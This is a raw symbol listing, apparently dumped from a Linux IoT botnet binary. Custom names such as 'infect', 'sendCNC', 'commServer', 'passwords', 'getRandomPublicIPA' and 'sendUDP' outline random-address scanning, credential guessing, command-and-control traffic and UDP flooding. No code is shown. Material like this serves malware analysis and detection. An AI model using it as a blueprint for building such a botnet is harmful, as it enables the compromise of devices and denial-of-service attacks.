__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
rangesC3
ntohs
sendUDP
inet_ntoa
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
fdpopen
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
rangesB1
__GI__exit
herror
strcmp
infected
shutdown
advances2
__nameserver
data_start
infect
__h_errno_location
matchPrompt
getcwd
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
advance_state
_fini
__GI_chdir
__vfork
__malloc_sbrk_lock
contains_success
sprintf
fdgets
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
fails
commServer
getRandomPublicIPC
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
__atexit_lock
scanPid
rand_cmwc
findARandomIP
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
alula
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
subversionnnn
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
contains_response
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
contains_infectmessage
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
rangesC2
__stdio_WRITE
_stdio_init
__GI_geteuid
__heap_alloc
inet_ntop
__C_ctype_toupper_data
__GI_getcwd
_dl_aux_init
__GI_perror
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
toupper
__libc_write
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
fputs
__GI_raise
__data_start
setsid
__GI_inet_addr
getRandomPublicIPA
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
readUntil
fcntl
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
tcsetattr
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
close
__libc_connect
passwords
__GI_strlen
mainCommSock
pids
sendCNC
vfprintf
strpbrk
getBogos
_load_inttype
rangechoice
raise
useragents
free
sigprocmask
getsockname
